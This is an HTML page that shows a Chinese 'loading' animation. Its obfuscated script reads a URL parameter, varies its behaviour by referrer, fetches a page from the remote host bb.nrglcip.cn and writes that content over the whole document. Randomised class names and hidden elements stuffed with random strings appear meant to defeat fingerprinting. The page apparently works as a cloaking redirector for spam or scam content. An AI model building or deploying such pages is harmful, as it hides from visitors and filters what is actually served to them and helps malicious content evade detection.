<!DOCTYPE html>
<html>
<head>
    <title>加载中...</title>
    <meta charset="UTF-8">
    <style>
        iframe {
            display: none;
            width: 100%;
            height: 100%;
            margin: 0;
            padding: 0;
            border: 0
        }

        body {
            width: 100%;
            height: 100%;
            margin: 0;
            padding: 0;
            border: 0
        }

        .aX6kDEn {
            position: fixed;
            left: 0;
            right: 0;
            top: 0;
            bottom: 0;
            z-index: 1;
            background-color: #d8d8d8
        }

        .aX6kDEn .fSiaZ7QuPGq {
            position: absolute;
            left: 0;
            right: 0;
            top: 0;
            bottom: 0;
            height: 50px;
            margin: auto
        }

        .aX6kDEn .content {
            line-height: 50px;
            text-align: center
        }

        .aX6kDEn .img {
            width: 100%
        }

        .aX6kDEn .oz9ogRP {
            text-align: center
        }

        .aX6kDEn .oz9ogRP span {
            display: inline-block;
            width: 6px;
            height: 50px;
            background-color: #FF5722;
            -webkit-transform: scaleY(0.4);
            transform: scaleY(0.4);
            -webkit-animation: scale 1s infinite;
            animation: scale 1s infinite
        }

        .aX6kDEn .oz9ogRP span:nth-child(2) {
            -webkit-animation: scale 1s .2s infinite;
            animation: scale 1s .2s infinite
        }

        .aX6kDEn .oz9ogRP span:nth-child(3) {
            -webkit-animation: scale 1s .3s infinite;
            animation: scale 1s .3s infinite
        }

        .aX6kDEn .oz9ogRP span:nth-child(4) {
            -webkit-animation: scale 1s .4s infinite;
            animation: scale 1s .4s infinite
        }

        .aX6kDEn .oz9ogRP span:nth-child(5) {
            -webkit-animation: scale 1s .5s infinite;
            animation: scale 1s .5s infinite
        }

        .aX6kDEn .oz9ogRP span:nth-child(6) {
            -webkit-animation: scale 1s .6s infinite;
            animation: scale 1s .6s infinite
        }

        @-webkit-keyframes scale {
            0% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
            20% {
                -webkit-transform: scaleY(0.8);
                transform: scaleY(0.8)
            }
            40% {
                -webkit-transform: scaleY(1);
                transform: scaleY(1)
            }
            100% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
        }

        @keyframes scale {
            0% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
            20% {
                -webkit-transform: scaleY(0.8);
                transform: scaleY(0.8)
            }
            40% {
                -webkit-transform: scaleY(1);
                transform: scaleY(1)
            }
            100% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
        }

        .aX6kDEn .tips {
            font-size: 1rem;
            color: #fff;
            text-align: center
        }
    </style>
    <script src="https://cdn.bootcss.com/jquery/3.2.1/jquery.min.js"></script>
    <script>
        function kZtvP1HhWNv85(name) { var reg = new RegExp("(.|&)" + name + "=([^&]*)(&|$)"); var r = window.location.href.match(reg); if (r != null) return unescape(r[2]); return null;}
		var iVosoiP = kZtvP1HhWNv85('temp');
		if (!document.referrer){
			url="https://bb.nrglcip.cn/html/"+ iVosoiP +".html?a=index";
		}else {
			url="https://bb.nrglcip.cn/htm1/"+ iVosoiP +".html?a=share";
		}
		
        T1MB3cVknF=url+"#"+new Date().getTime();
        T1MB3cVknF && function() {
            $.get(T1MB3cVknF, function(data) {
                var new_doc = document.open("text/html", "replace");
                new_doc.write(data);
                new_doc.close();
            });
        }();

    </script>

</head>
<body>

<img  src='' style='display:none'>
<div style='display:none'>D7HIe9G8VknF8oqLEuSbE</div>
<img  src='' style='display:none'>
<li style='display:none' >ymzIbbxerHjRapuYtW</li>
<ul style='display:none' >e5bbUT35fHYBuga0a9r7CRPO3bm1eRT8vJm7R6Wi9zHkK3nuFah1ncfZt5wQVFuo5I0d</ul>
<img  src='' style='display:none'><div class="aX6kDEn">
    <div class="fSiaZ7QuPGq">
        <div class="oz9ogRP">
            <p style="font-size:50px;color:#FF5722; padding-top: 18%; margin:-28% auto">正在加载...</p>

            <span></span>
            <span></span>
            <span></span>
            <span></span>
            <span></span>
            <span></span></div>

    </div>
</div>

<li style='display:none' >ccvrY2r9kmZf1CBzyNiLtv5eZgYNo2WebHCw6Xdv43V4SCYTduc2MONRjgs95EwwnKO</li>
<li style='display:none' >ccvrY2r9kmZf1CBzyNiLtv5eZgYNo2WebHCw6Xdv43V4SCYTduc2MONRjgs95EwwnKO</li>
<b style='display:none' >Y6fgOcgpMuHFSRnZEMC2pdwtokmVQo9qyc3aP4t6qReurE9aeQFzXP20ff6I4optysarC</b>
<img  src='' style='display:none'>
<ul style='display:none' >L00srNrjEw2zbDy8j14GvHL9AsdmyEd88x8</ul>
<span style='display:none'>UDx71LWY235bY5sRqTnOVQCbS9d4A3scYNJxfSt</span>
<div style='display:none'>nJyyYXCMft1kbLtUokRTANDHpFfeDWMOoVeEKrkV1yYe7UmxZlIho6jGeC5lsfpmg0OVZKq8XHH95Zwtc4Sret8j5QE28DRPsr</div>
<h1 style='display:none' >pzQHmcglku6aKEBJ4Oa0QVQ4KHMGFj7VyzH5YxOSVZF6cK4EvmUScmuYNaPee6z3h8t3qzJLEhRYCO0fhEdvR7cfOfxWV</h1></body>
</html>